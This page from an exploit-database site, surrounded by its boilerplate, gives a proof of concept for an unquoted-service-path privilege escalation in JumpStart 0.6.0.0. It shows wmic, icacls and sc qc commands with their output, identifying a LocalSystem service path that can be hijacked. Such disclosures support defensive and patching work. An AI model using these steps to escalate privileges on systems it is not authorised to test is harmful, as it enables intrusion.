0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JumpStart 0.6.0.0 - (jswpbapi) Unquoted Service Path Vulnerability
# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path # Exploit Author: Roberto Escamilla # Vendor Homepage:https://www.inforprograma.net/ # Software Link: https://www.inforprograma.net/ # Version: = 0.6.0.0 wpspin.exe # Tested on: Windows 10 Home # CVE : N/A ###############STEPS########################## # 1.- Install the JumpStart application on Windows 10 Home Operating System # 2.- Open our "System Symbol" application. # 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ # 4.- The following will appear in a list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe # 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below: NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) # 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges # since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: # LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: jswpbapi TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : JumpStart Push-Button Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem # 0day.today [2024-12-24] #